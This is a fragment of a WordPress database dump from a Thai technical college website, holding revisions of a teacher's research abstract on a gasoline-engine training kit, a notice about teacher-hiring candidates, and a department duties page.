(3500, 1, '2018-07-21 12:35:53', '2018-07-21 05:35:53', '[[\"\\u0e19\\u0e32\\u0e22\\u0e1b\\u0e23\\u0e30\\u0e20\\u0e32\\u0e2a \\u0e1e\\u0e27\\u0e07\\u0e0a\\u0e37\\u0e48\\u0e19\",\"  \\u0e04\\u0e23\\u0e39\\u0e0a\\u0e33\\u0e19\\u0e32\\u0e0d\\u0e01\\u0e32\\u0e23\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29\",\"<a href=\\\"http:\\/\\/www.technicrayong.ac.th\\/%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B8%AA%E0%B8%A3%E0%B9%89%E0%B8%B2%E0%B8%87%E0%B9%81%E0%B8%A5%E0%B8%B0%E0%B8%AB%E0%B8%B2%E0%B8%9B%E0%B8%A3%E0%B8%B0%E0%B8%AA%E0%B8%B4%E0%B8%97%E0%B8%98%E0%B8%B4%E0%B8%A0\\/\\\">\\u0e40\\u0e1b\\u0e34\\u0e14\\u0e2d\\u0e48\\u0e32\\u0e19<\\/a>\"]]', 'Work Teacher', 'ผลงานวิชาการของครู-อาจารย์', 'inherit', 'closed', 'closed', '', '3484-revision-v1', '', '', '2018-07-21 12:35:53', '2018-07-21 05:35:53', '', 3484, 'http://www.technicrayong.ac.th/3484-revision-v1/', 0, 'revision', '', 0),
(3501, 1, '2018-07-21 12:36:15', '2018-07-21 05:36:15', '[[\"\\u0e19\\u0e32\\u0e22\\u0e1b\\u0e23\\u0e30\\u0e20\\u0e32\\u0e2a \\u0e1e\\u0e27\\u0e07\\u0e0a\\u0e37\\u0e48\\u0e19\",\"  \\u0e04\\u0e23\\u0e39\\u0e0a\\u0e33\\u0e19\\u0e32\\u0e0d\\u0e01\\u0e32\\u0e23\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29\",\"<a href=\\\"http:\\/\\/www.technicrayong.ac.th\\/%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B8%AA%E0%B8%A3%E0%B9%89%E0%B8%B2%E0%B8%87%E0%B9%81%E0%B8%A5%E0%B8%B0%E0%B8%AB%E0%B8%B2%E0%B8%9B%E0%B8%A3%E0%B8%B0%E0%B8%AA%E0%B8%B4%E0%B8%97%E0%B8%98%E0%B8%B4%E0%B8%A0\\/\\\">\\u0e40\\u0e1b\\u0e34\\u0e14\\u0e2d\\u0e48\\u0e32\\u0e19<\\/a>\"]]', 'Work Teacher', 'ผลงานวิชาการของครู-อาจารย์', 'inherit', 'closed', 'closed', '', '3484-revision-v1', '', '', '2018-07-21 12:36:15', '2018-07-21 05:36:15', '', 3484, 'http://www.technicrayong.ac.th/3484-revision-v1/', 0, 'revision', '', 0),
(3502, 1, '2018-07-21 12:36:36', '2018-07-21 05:36:36', '[[\"\\u0e19\\u0e32\\u0e22\\u0e1b\\u0e23\\u0e30\\u0e20\\u0e32\\u0e2a \\u0e1e\\u0e27\\u0e07\\u0e0a\\u0e37\\u0e48\\u0e19\",\"\\u0e04\\u0e23\\u0e39\\u0e0a\\u0e33\\u0e19\\u0e32\\u0e0d\\u0e01\\u0e32\\u0e23\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29\",\"<a href=\\\"http:\\/\\/www.technicrayong.ac.th\\/%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B8%AA%E0%B8%A3%E0%B9%89%E0%B8%B2%E0%B8%87%E0%B9%81%E0%B8%A5%E0%B8%B0%E0%B8%AB%E0%B8%B2%E0%B8%9B%E0%B8%A3%E0%B8%B0%E0%B8%AA%E0%B8%B4%E0%B8%97%E0%B8%98%E0%B8%B4%E0%B8%A0\\/\\\">\\u0e40\\u0e1b\\u0e34\\u0e14\\u0e2d\\u0e48\\u0e32\\u0e19<\\/a>\"]]', 'Work Teacher', 'ผลงานวิชาการของครู-อาจารย์', 'inherit', 'closed', 'closed', '', '3484-revision-v1', '', '', '2018-07-21 12:36:36', '2018-07-21 05:36:36', '', 3484, 'http://www.technicrayong.ac.th/3484-revision-v1/', 0, 'revision', '', 0),
(3504, 1, '2018-07-21 13:35:19', '2018-07-21 06:35:19', '', 'Page-Prapas', '', 'publish', 'closed', 'closed', '', 'page-prapas', '', '', '2018-07-21 13:50:09', '2018-07-21 06:50:09', '', 0, 'http://www.technicrayong.ac.th/?post_type=counter_numbers&p=3504', 0, 'counter_numbers', '', 0),
(3507, 1, '2018-07-21 13:36:27', '2018-07-21 06:36:27', 'ชื่อ : นายประภาส พวงชื่น\r\nชื่องานวิจัย : การสร้างและหาประสิทธิภาพชุดฝึกระบบเครื่องยนต์แก๊สโซลีนควบคุมด้วยอิเล็กทรอนิกส์\r\nพ.ศ. : 2560\r\n\r\nบทคัดย่อ\r\n\r\nการศึกษาวิจัยในครั้งนี้เป็นวิจัยเชิงทดลอง (Experimental Research) มีวัตถุประสงค์เพื่อ 1) สร้างชุดฝึกระบบเครื่องยนต์แก๊สโซลีนควบคุมด้วยอิเล็กทรอนิกส์ให้มีคุณภาพ 2) หาประสิทธิภาพชุดฝึกระบบเครื่องยนต์แก๊สโซลีนควบคุมด้วยอิเล็กทรอนิกส์ที่สร้างขึ้น 3) เปรียบเทียบผลสัมฤทธิ์ทางการเรียนของนักศึกษาก่อนเรียนและหลังเรียนโดยใช้ชุดฝึกระบบเครื่องยนต์แก๊สโซลีนควบคุมด้วยอิเล็กทรอนิกส์ 4) เปรียบเทียบทักษะปฏิบัติระบบเครื่องยนต์แก๊สโซลีนควบคุมด้วยอิเล็กทรอนิกส์ของนักศึกษาเทียบกับเกณฑ์\r\n\r\nปีการศึกษา 2559 ผู้วิจัยนำชุดฝึกระบบเครื่องยนต์แก๊สโซลีนควบคุมด้วยอิเล็กทรอนิกส์ที่สร้างขึ้นไปทดลองใช้กับนักศึกษาประกาศนียบัตรวิชาชีพชั้นสูง สาขาวิชาช่างยนต์ที่ผู้วิจัยรับผิดชอบสอน โดยทดลองใช้ชุดฝึกกับนักศึกษารายบุคคล 1 คน จากนั้นปรับปรุงชุดฝึกไปทดลองใช้กับนักศึกษากลุ่มเล็ก 3 คน นำข้อบกพร่องแก้ไข แล้วจึงนำชุดฝึกไปใช้กับนักศึกษากลุ่มใหญ่ 18 คน เพื่อหาประสิทธิภาพของชุดฝึก โดยใช้เกณฑ์ 80/80\r\n\r\nปีการศึกษา 2560 ทดสอบวัดผลสัมฤทธิ์ทางการเรียนก่อนเรียน (Pre-test) ของนักศึกษา จากนั้นใช้ชุดฝึกระบบเครื่องยนต์แก๊สโซลีนควบคุมด้วยอิเล็กทรอนิกส์ในการเรียนการสอน แล้วให้ผู้เรียนทำแบบทดสอบวัดผลสัมฤทธิ์ทางการเรียนหลังเรียน (Post test) ด้วยแบบทดสอบวัดผลสัมฤทธิ์ทางการเรียนรายวิชางานระบบเครื่องยนต์แก๊สโซลีนควบคุมด้วยอิเล็กทรอนิกส์ รหัสวิชา 3101-2101 จำนวน 40 ข้อ\r\n\r\nผลการวิจัยพบว่า คุณภาพของชุดฝึกระบบเครื่องยนต์แก๊สโซลีนควบคุมด้วยอิเล็กทรอนิกส์ เมื่อพิจารณาเป็นรายด้านพบว่า ด้านการออกแบบสร้างชุดฝึก มีค่าเฉลี่ยเท่ากับ 4.76 และด้านเอกสารประกอบชุดฝึกมีค่าเฉลี่ยเท่ากับ 4.73 ค่าเฉลี่ยรวมทุกด้านเท่ากับ 4.75 สูงกว่าเกณฑ์ที่กำหนดค่าเฉลี่ยรวมไม่ต่ำกว่า 3.50 ชุดฝึกระบบเครื่องยนต์แก๊สโซลีนควบคุมด้วยอิเล็กทรอนิกส์ที่ผู้วิจัยสร้างขึ้นมีประสิทธิภาพเท่ากับ 89.92/88.83 สูงกว่าเกณฑ์ 80/80 ที่กำหนดไว้ ผลสัมฤทธิ์ทางการเรียนของนักศึกษาก่อนและหลัง โดยใช้ชุดฝึกระบบเครื่องยนต์แก๊ส โซลีนควบคุมด้วยอิเล็กทรอนิกส์แตกต่างกันอย่างมีนัยสำคัญทางสถิติที่ระดับ .05 นั่นคือ ผลสัมฤทธิ์ทางการเรียน ของนักศึกษาที่เรียนโดยใช้ชุดฝึกระบบเครื่องยนต์แก๊สโซลีนควบคุมด้วยอิเล็กทรอนิกส์หลังเรียนสูงกว่าก่อนเรียน ทักษะการปฏิบัติระบบเครื่องยนต์แก๊สโซลีนควบคุมด้วยอิเล็กทรอนิกส์ของนักศึกษาทุกเรื่องสูงกว่าเกณฑ์(ร้อยละ 70) อย่างมีนัยสำคัญทางสถิติที่ระดับ .05\r\n\r\n \r\n\r\nhttps://youtu.be/a7qGKlOZTuc\r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\nhttps://youtu.be/mRsG_Ypyppw\r\n\r\n \r\n<p style=\"text-align: center;\">[COUNTER_NUMBER id=3504]</p>', 'การสร้างและหาประสิทธิภาพชุดฝึกระบบเครื่องยนต์แก๊สโซลีนควบคุมด้วยอิเล็กทรอนิกส์', '', 'inherit', 'closed', 'closed', '', '3485-revision-v1', '', '', '2018-07-21 13:36:27', '2018-07-21 06:36:27', '', 3485, 'http://www.technicrayong.ac.th/3485-revision-v1/', 0, 'revision', '', 0),
(3508, 1, '2018-07-21 13:37:40', '2018-07-21 06:37:40', 'ชื่อ : นายประภาส พวงชื่น\r\nชื่องานวิจัย : การสร้างและหาประสิทธิภาพชุดฝึกระบบเครื่องยนต์แก๊สโซลีนควบคุมด้วยอิเล็กทรอนิกส์\r\nพ.ศ. : 2560\r\n\r\nบทคัดย่อ\r\n\r\nการศึกษาวิจัยในครั้งนี้เป็นวิจัยเชิงทดลอง (Experimental Research) มีวัตถุประสงค์เพื่อ 1) สร้างชุดฝึกระบบเครื่องยนต์แก๊สโซลีนควบคุมด้วยอิเล็กทรอนิกส์ให้มีคุณภาพ 2) หาประสิทธิภาพชุดฝึกระบบเครื่องยนต์แก๊สโซลีนควบคุมด้วยอิเล็กทรอนิกส์ที่สร้างขึ้น 3) เปรียบเทียบผลสัมฤทธิ์ทางการเรียนของนักศึกษาก่อนเรียนและหลังเรียนโดยใช้ชุดฝึกระบบเครื่องยนต์แก๊สโซลีนควบคุมด้วยอิเล็กทรอนิกส์ 4) เปรียบเทียบทักษะปฏิบัติระบบเครื่องยนต์แก๊สโซลีนควบคุมด้วยอิเล็กทรอนิกส์ของนักศึกษาเทียบกับเกณฑ์\r\n\r\nปีการศึกษา 2559 ผู้วิจัยนำชุดฝึกระบบเครื่องยนต์แก๊สโซลีนควบคุมด้วยอิเล็กทรอนิกส์ที่สร้างขึ้นไปทดลองใช้กับนักศึกษาประกาศนียบัตรวิชาชีพชั้นสูง สาขาวิชาช่างยนต์ที่ผู้วิจัยรับผิดชอบสอน โดยทดลองใช้ชุดฝึกกับนักศึกษารายบุคคล 1 คน จากนั้นปรับปรุงชุดฝึกไปทดลองใช้กับนักศึกษากลุ่มเล็ก 3 คน นำข้อบกพร่องแก้ไข แล้วจึงนำชุดฝึกไปใช้กับนักศึกษากลุ่มใหญ่ 18 คน เพื่อหาประสิทธิภาพของชุดฝึก โดยใช้เกณฑ์ 80/80\r\n\r\nปีการศึกษา 2560 ทดสอบวัดผลสัมฤทธิ์ทางการเรียนก่อนเรียน (Pre-test) ของนักศึกษา จากนั้นใช้ชุดฝึกระบบเครื่องยนต์แก๊สโซลีนควบคุมด้วยอิเล็กทรอนิกส์ในการเรียนการสอน แล้วให้ผู้เรียนทำแบบทดสอบวัดผลสัมฤทธิ์ทางการเรียนหลังเรียน (Post test) ด้วยแบบทดสอบวัดผลสัมฤทธิ์ทางการเรียนรายวิชางานระบบเครื่องยนต์แก๊สโซลีนควบคุมด้วยอิเล็กทรอนิกส์ รหัสวิชา 3101-2101 จำนวน 40 ข้อ\r\n\r\nผลการวิจัยพบว่า คุณภาพของชุดฝึกระบบเครื่องยนต์แก๊สโซลีนควบคุมด้วยอิเล็กทรอนิกส์ เมื่อพิจารณาเป็นรายด้านพบว่า ด้านการออกแบบสร้างชุดฝึก มีค่าเฉลี่ยเท่ากับ 4.76 และด้านเอกสารประกอบชุดฝึกมีค่าเฉลี่ยเท่ากับ 4.73 ค่าเฉลี่ยรวมทุกด้านเท่ากับ 4.75 สูงกว่าเกณฑ์ที่กำหนดค่าเฉลี่ยรวมไม่ต่ำกว่า 3.50 ชุดฝึกระบบเครื่องยนต์แก๊สโซลีนควบคุมด้วยอิเล็กทรอนิกส์ที่ผู้วิจัยสร้างขึ้นมีประสิทธิภาพเท่ากับ 89.92/88.83 สูงกว่าเกณฑ์ 80/80 ที่กำหนดไว้ ผลสัมฤทธิ์ทางการเรียนของนักศึกษาก่อนและหลัง โดยใช้ชุดฝึกระบบเครื่องยนต์แก๊ส โซลีนควบคุมด้วยอิเล็กทรอนิกส์แตกต่างกันอย่างมีนัยสำคัญทางสถิติที่ระดับ .05 นั่นคือ ผลสัมฤทธิ์ทางการเรียน ของนักศึกษาที่เรียนโดยใช้ชุดฝึกระบบเครื่องยนต์แก๊สโซลีนควบคุมด้วยอิเล็กทรอนิกส์หลังเรียนสูงกว่าก่อนเรียน ทักษะการปฏิบัติระบบเครื่องยนต์แก๊สโซลีนควบคุมด้วยอิเล็กทรอนิกส์ของนักศึกษาทุกเรื่องสูงกว่าเกณฑ์(ร้อยละ 70) อย่างมีนัยสำคัญทางสถิติที่ระดับ .05\r\n\r\n \r\n\r\nhttps://youtu.be/a7qGKlOZTuc\r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\nhttps://youtu.be/mRsG_Ypyppw\r\n\r\n \r\n[COUNTER_NUMBER id=3504]', 'การสร้างและหาประสิทธิภาพชุดฝึกระบบเครื่องยนต์แก๊สโซลีนควบคุมด้วยอิเล็กทรอนิกส์', '', 'inherit', 'closed', 'closed', '', '3485-revision-v1', '', '', '2018-07-21 13:37:40', '2018-07-21 06:37:40', '', 3485, 'http://www.technicrayong.ac.th/3485-revision-v1/', 0, 'revision', '', 0),
(3515, 1, '2018-07-21 13:58:20', '2018-07-21 06:58:20', '<a href=\"/wp-content/uploads/2018/07/aj-prapas.jpg\"><img class=\"alignnone wp-image-3481 aligncenter\" src=\"/wp-content/uploads/2018/07/aj-prapas.jpg\" alt=\"\" width=\"150\" height=\"189\" /></a>\r\nชื่อ : นายประภาส พวงชื่น\r\nชื่องานวิจัย : การสร้างและหาประสิทธิภาพชุดฝึกระบบเครื่องยนต์แก๊สโซลีนควบคุมด้วยอิเล็กทรอนิกส์\r\nพ.ศ. : 2560\r\n\r\nบทคัดย่อ\r\n\r\nการศึกษาวิจัยในครั้งนี้เป็นวิจัยเชิงทดลอง (Experimental Research) มีวัตถุประสงค์เพื่อ 1) สร้างชุดฝึกระบบเครื่องยนต์แก๊สโซลีนควบคุมด้วยอิเล็กทรอนิกส์ให้มีคุณภาพ 2) หาประสิทธิภาพชุดฝึกระบบเครื่องยนต์แก๊สโซลีนควบคุมด้วยอิเล็กทรอนิกส์ที่สร้างขึ้น 3) เปรียบเทียบผลสัมฤทธิ์ทางการเรียนของนักศึกษาก่อนเรียนและหลังเรียนโดยใช้ชุดฝึกระบบเครื่องยนต์แก๊สโซลีนควบคุมด้วยอิเล็กทรอนิกส์ 4) เปรียบเทียบทักษะปฏิบัติระบบเครื่องยนต์แก๊สโซลีนควบคุมด้วยอิเล็กทรอนิกส์ของนักศึกษาเทียบกับเกณฑ์\r\n\r\nปีการศึกษา 2559 ผู้วิจัยนำชุดฝึกระบบเครื่องยนต์แก๊สโซลีนควบคุมด้วยอิเล็กทรอนิกส์ที่สร้างขึ้นไปทดลองใช้กับนักศึกษาประกาศนียบัตรวิชาชีพชั้นสูง สาขาวิชาช่างยนต์ที่ผู้วิจัยรับผิดชอบสอน โดยทดลองใช้ชุดฝึกกับนักศึกษารายบุคคล 1 คน จากนั้นปรับปรุงชุดฝึกไปทดลองใช้กับนักศึกษากลุ่มเล็ก 3 คน นำข้อบกพร่องแก้ไข แล้วจึงนำชุดฝึกไปใช้กับนักศึกษากลุ่มใหญ่ 18 คน เพื่อหาประสิทธิภาพของชุดฝึก โดยใช้เกณฑ์ 80/80\r\n\r\nปีการศึกษา 2560 ทดสอบวัดผลสัมฤทธิ์ทางการเรียนก่อนเรียน (Pre-test) ของนักศึกษา จากนั้นใช้ชุดฝึกระบบเครื่องยนต์แก๊สโซลีนควบคุมด้วยอิเล็กทรอนิกส์ในการเรียนการสอน แล้วให้ผู้เรียนทำแบบทดสอบวัดผลสัมฤทธิ์ทางการเรียนหลังเรียน (Post test) ด้วยแบบทดสอบวัดผลสัมฤทธิ์ทางการเรียนรายวิชางานระบบเครื่องยนต์แก๊สโซลีนควบคุมด้วยอิเล็กทรอนิกส์ รหัสวิชา 3101-2101 จำนวน 40 ข้อ\r\n\r\nผลการวิจัยพบว่า คุณภาพของชุดฝึกระบบเครื่องยนต์แก๊สโซลีนควบคุมด้วยอิเล็กทรอนิกส์ เมื่อพิจารณาเป็นรายด้านพบว่า ด้านการออกแบบสร้างชุดฝึก มีค่าเฉลี่ยเท่ากับ 4.76 และด้านเอกสารประกอบชุดฝึกมีค่าเฉลี่ยเท่ากับ 4.73 ค่าเฉลี่ยรวมทุกด้านเท่ากับ 4.75 สูงกว่าเกณฑ์ที่กำหนดค่าเฉลี่ยรวมไม่ต่ำกว่า 3.50 ชุดฝึกระบบเครื่องยนต์แก๊สโซลีนควบคุมด้วยอิเล็กทรอนิกส์ที่ผู้วิจัยสร้างขึ้นมีประสิทธิภาพเท่ากับ 89.92/88.83 สูงกว่าเกณฑ์ 80/80 ที่กำหนดไว้ ผลสัมฤทธิ์ทางการเรียนของนักศึกษาก่อนและหลัง โดยใช้ชุดฝึกระบบเครื่องยนต์แก๊ส โซลีนควบคุมด้วยอิเล็กทรอนิกส์แตกต่างกันอย่างมีนัยสำคัญทางสถิติที่ระดับ .05 นั่นคือ ผลสัมฤทธิ์ทางการเรียน ของนักศึกษาที่เรียนโดยใช้ชุดฝึกระบบเครื่องยนต์แก๊สโซลีนควบคุมด้วยอิเล็กทรอนิกส์หลังเรียนสูงกว่าก่อนเรียน ทักษะการปฏิบัติระบบเครื่องยนต์แก๊สโซลีนควบคุมด้วยอิเล็กทรอนิกส์ของนักศึกษาทุกเรื่องสูงกว่าเกณฑ์(ร้อยละ 70) อย่างมีนัยสำคัญทางสถิติที่ระดับ .05\r\n\r\n \r\n\r\nhttps://youtu.be/a7qGKlOZTuc\r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\nhttps://youtu.be/mRsG_Ypyppw\r\n\r\n[COUNTER_NUMBER id=3504]', 'การสร้างและหาประสิทธิภาพชุดฝึกระบบเครื่องยนต์แก๊สโซลีนควบคุมด้วยอิเล็กทรอนิกส์', '', 'inherit', 'closed', 'closed', '', '3485-revision-v1', '', '', '2018-07-21 13:58:20', '2018-07-21 06:58:20', '', 3485, 'http://www.technicrayong.ac.th/3485-revision-v1/', 0, 'revision', '', 0),
(3518, 3, '2018-07-23 16:03:35', '2018-07-23 09:03:35', '[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F07%2F%E0%B8%9B%E0%B8%A3%E0%B8%B0%E0%B8%81%E0%B8%B2%E0%B8%A8-%E0%B8%A3%E0%B8%B2%E0%B8%A2%E0%B8%8A%E0%B8%B7%E0%B9%88%E0%B8%AD%E0%B8%9C%E0%B8%B9%E0%B9%89%E0%B8%A1%E0%B8%B5%E0%B8%AA%E0%B8%B4%E0%B8%97%E0%B8%98%E0%B8%B4%E0%B9%8C%E0%B8%AA%E0%B8%AD%E0%B8%9A%E0%B8%84%E0%B8%B1%E0%B8%94%E0%B9%80%E0%B8%A5%E0%B8%B7%E0%B8%AD%E0%B8%81%E0%B9%80%E0%B8%9B%E0%B9%87%E0%B8%99%E0%B8%84%E0%B8%A3%E0%B8%B9%E0%B8%AD%E0%B8%B1%E0%B8%95%E0%B8%A3%E0%B8%B2%E0%B8%88%E0%B9%89%E0%B8%B2%E0%B8%87-%E0%B8%88%E0%B8%B3%E0%B8%99%E0%B8%A7%E0%B8%99-4-%E0%B8%AD%E0%B8%B1%E0%B8%95%E0%B8%A3%E0%B8%B2.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]', 'ประกาศ รายชื่อผู้มีสิทธิ์สอบคัดเลือกเป็นลูกจ้างชั่วคราว ทำหน้าที่ ครูอัตราจ้าง จำนวน 4 อัตรา', '', 'publish', 'closed', 'open', '', '%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%81%e0%b8%b2%e0%b8%a8-%e0%b8%a3%e0%b8%b2%e0%b8%a2%e0%b8%8a%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%9c%e0%b8%b9%e0%b9%89%e0%b8%a1%e0%b8%b5%e0%b8%aa%e0%b8%b4%e0%b8%97-2', '', '', '2018-07-23 16:03:35', '2018-07-23 09:03:35', '', 0, 'http://www.technicrayong.ac.th/?p=3518', 363, 'post', '', 0),
(3519, 3, '2018-07-23 16:02:56', '2018-07-23 09:02:56', '', 'ประกาศ รายชื่อผู้มีสิทธิ์สอบคัดเลือกเป็นครูอัตราจ้าง จำนวน 4 อัตรา', '', 'inherit', 'closed', 'closed', '', '%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%81%e0%b8%b2%e0%b8%a8-%e0%b8%a3%e0%b8%b2%e0%b8%a2%e0%b8%8a%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%9c%e0%b8%b9%e0%b9%89%e0%b8%a1%e0%b8%b5%e0%b8%aa%e0%b8%b4%e0%b8%97-2', '', '', '2018-07-23 16:02:56', '2018-07-23 09:02:56', '', 3518, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/07/ประกาศ-รายชื่อผู้มีสิทธิ์สอบคัดเลือกเป็นครูอัตราจ้าง-จำนวน-4-อัตรา.pdf', 0, 'attachment', 'application/pdf', 0),
(3520, 3, '2018-07-23 16:03:35', '2018-07-23 09:03:35', '[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F07%2F%E0%B8%9B%E0%B8%A3%E0%B8%B0%E0%B8%81%E0%B8%B2%E0%B8%A8-%E0%B8%A3%E0%B8%B2%E0%B8%A2%E0%B8%8A%E0%B8%B7%E0%B9%88%E0%B8%AD%E0%B8%9C%E0%B8%B9%E0%B9%89%E0%B8%A1%E0%B8%B5%E0%B8%AA%E0%B8%B4%E0%B8%97%E0%B8%98%E0%B8%B4%E0%B9%8C%E0%B8%AA%E0%B8%AD%E0%B8%9A%E0%B8%84%E0%B8%B1%E0%B8%94%E0%B9%80%E0%B8%A5%E0%B8%B7%E0%B8%AD%E0%B8%81%E0%B9%80%E0%B8%9B%E0%B9%87%E0%B8%99%E0%B8%84%E0%B8%A3%E0%B8%B9%E0%B8%AD%E0%B8%B1%E0%B8%95%E0%B8%A3%E0%B8%B2%E0%B8%88%E0%B9%89%E0%B8%B2%E0%B8%87-%E0%B8%88%E0%B8%B3%E0%B8%99%E0%B8%A7%E0%B8%99-4-%E0%B8%AD%E0%B8%B1%E0%B8%95%E0%B8%A3%E0%B8%B2.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]', 'ประกาศ รายชื่อผู้มีสิทธิ์สอบคัดเลือกเป็นลูกจ้างชั่วคราว ทำหน้าที่ ครูอัตราจ้าง จำนวน 4 อัตรา', '', 'inherit', 'closed', 'closed', '', '3518-revision-v1', '', '', '2018-07-23 16:03:35', '2018-07-23 09:03:35', '', 3518, 'http://www.technicrayong.ac.th/3518-revision-v1/', 0, 'revision', '', 0),
(3521, 3, '2018-07-23 16:03:45', '2018-07-23 09:03:45', '[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F07%2F%E0%B8%9B%E0%B8%A3%E0%B8%B0%E0%B8%81%E0%B8%B2%E0%B8%A8-%E0%B8%A3%E0%B8%B2%E0%B8%A2%E0%B8%8A%E0%B8%B7%E0%B9%88%E0%B8%AD%E0%B8%9C%E0%B8%B9%E0%B9%89%E0%B8%A1%E0%B8%B5%E0%B8%AA%E0%B8%B4%E0%B8%97%E0%B8%98%E0%B8%B4%E0%B9%8C%E0%B8%AA%E0%B8%AD%E0%B8%9A%E0%B8%84%E0%B8%B1%E0%B8%94%E0%B9%80%E0%B8%A5%E0%B8%B7%E0%B8%AD%E0%B8%81%E0%B9%80%E0%B8%9B%E0%B9%87%E0%B8%99%E0%B8%84%E0%B8%A3%E0%B8%B9%E0%B8%AD%E0%B8%B1%E0%B8%95%E0%B8%A3%E0%B8%B2%E0%B8%88%E0%B9%89%E0%B8%B2%E0%B8%87-%E0%B8%88%E0%B8%B3%E0%B8%99%E0%B8%A7%E0%B8%99-4-%E0%B8%AD%E0%B8%B1%E0%B8%95%E0%B8%A3%E0%B8%B2.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]', 'ประกาศ รายชื่อผู้มีสิทธิ์สอบคัดเลือกเป็นลูกจ้างชั่วคราว ทำหน้าที่ ครูอัตราจ้าง จำนวน 4 อัตรา', '', 'inherit', 'closed', 'closed', '', '3518-autosave-v1', '', '', '2018-07-23 16:03:45', '2018-07-23 09:03:45', '', 3518, 'http://www.technicrayong.ac.th/3518-autosave-v1/', 0, 'revision', '', 0),
(3523, 3, '2018-07-24 10:24:33', '2018-07-24 03:24:33', '', '24-7-2561 9-59-35', '', 'inherit', 'closed', 'closed', '', '24-7-2561-9-59-35', '', '', '2018-07-24 10:24:33', '2018-07-24 03:24:33', '', 1757, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/07/24-7-2561-9-59-35.jpg', 0, 'attachment', 'image/jpeg', 0),
(3524, 3, '2018-07-24 10:26:05', '2018-07-24 03:26:05', '<img class=\"size-full wp-image-1652 aligncenter\" src=\"/wp-content/uploads/2018/03/7-3-2561-15-22-50.jpg\" alt=\"\" width=\"191\" height=\"237\" /><img class=\"wp-image-1650 aligncenter\" src=\"/wp-content/uploads/2018/03/7-3-2561-15-21-54-300x81.jpg\" alt=\"\" width=\"376\" height=\"102\" />\r\n\r\n<img class=\"wp-image-1755 size-full aligncenter\" src=\"/wp-content/uploads/2018/03/12-3-2561-14-57-21.jpg\" alt=\"\" width=\"574\" height=\"318\" />\r\n\r\n<a href=\"http://incubator.technicrayong.ac.th/portal.php\"><img class=\"aligncenter wp-image-3523 size-full\" src=\"/wp-content/uploads/2018/07/24-7-2561-9-59-35.jpg\" alt=\"\" width=\"983\" height=\"244\" /></a>\r\n\r\n<a href=\"https://www.facebook.com/incubator.rtc?fref=pb&hc_location=profile_browser\"><img class=\"alignleft wp-image-3443\" src=\"/wp-content/uploads/2018/07/12-7-2561-16-11-06.jpg\" alt=\"\" width=\"78\" height=\"93\" /></a>\r\n\r\n \r\n\r\n \r\n\r\n \r\n\r\n<img class=\"size-full wp-image-2971 alignleft\" src=\"/wp-content/uploads/2018/06/Trade_01.png\" alt=\"\" width=\"251\" height=\"48\" />\r\n\r\n \r\n\r\n \r\n\r\nงานส่งเสริมผลิตผล การค้า และประกอบธุรกิจ มีหน้าที่และความรับผิดชอบดังต่อไปนี้\r\n<ul>\r\n <li style=\"list-style-type: none;\">\r\n<ul>\r\n <li>ส่งเสริมให้ครู นักเรียน นักศึกษา และบุคลากรในสถานศึกษาดำเนินงาน ส่งเสริมผลิตผล จัดทำแผนธุรกิจร่วมกับหน่วยงานภาครัฐและเอกชน ส่งเสริมการทำธุรกิจขนาดย่อม การประกอบอาชีพอิสระเพื่อสร้างรายได้ให้สอดคล้องกับการเรียนการสอน</li>\r\n <li>วางแผน ดำเนินงาน ประสานสัมพันธ์ ร่วมมือกับบุคคล ชุมชน องค์กร ชุมชน องค์กรเอกชน องค์กรวิชาชีพ สถานประกอบการ หน่วยงานของรัฐ และรัฐวิสาหกิจ เพื่อรับงานการค้า รับจัดทำ รับบริการ รับจ้าง ผลิตเพื่อจำหน่าย การหารายได้ระหว่างเรียนการประกอบธุรกิจ และกิจกรรมสหกรณ์</li>\r\n <li>สอบผลิตผลทุกประเภทของสถานศึกษาให้ตรงกับโครงการฝึก จัดทำทะเบียนผลิตผล และจำหน่ายผลิตผล</li>\r\n <li>กำกับ ติดตาม และจัดทำบัญชีรายรับ–รายจ่ายของงานผลิตผล การค้า และธุรกิจ ที่อยู่ในความรับผิดชอบให้เป็นปัจจุบัน และจัดทำรายงานเป็นประจำทุกเดือน</li>\r\n <li>รวบรวมข้อมูล สถิติต่าง ๆ รายรับ–รายจ่ายในการดำเนินงาน เพื่อเป็นข้อมูลในการพิจารณาปรับปรุงแก้ไขพัฒนางาน ให้เกิดประโยชน์ต่อสถานศึกษา</li>\r\n <li>ประสานงานและให้ความร่วมมือกับหน่วยงานต่าง ๆ ทั้งภายในและภายนอกสถานศึกษา</li>\r\n <li>จัดทำปฏิทินการปฏิบัติงาน เสนอโครงการและรายงานการปฏิบัติงานตามลำดับขั้น</li>\r\n <li>ดูแล บำรุงรักษาและรับผิดชอบทรัพย์สินของสถานศึกษาที่ได้รับมอบหมาย</li>\r\n <li>ปฏิบัติงานอื่นตามที่ได้รับมอบหมาย</li>\r\n</ul>\r\n</li>\r\n</ul>\r\n \r\n\r\n<img class=\"wp-image-2972 size-full aligncenter\" src=\"/wp-content/uploads/2018/06/Natee-karnka-1.png\" alt=\"\" width=\"670\" height=\"2212\" />\r\n\r\n.\r\n\r\n ', 'งานส่งเสริมผลิตผล การค้า และประกอบธุรกิจ', '', 'inherit', 'closed', 'closed', '', '1757-revision-v1', '', '', '2018-07-24 10:26:05', '2018-07-24 03:26:05', '', 1757, 'http://www.technicrayong.ac.th/1757-revision-v1/', 0, 'revision', '', 0),
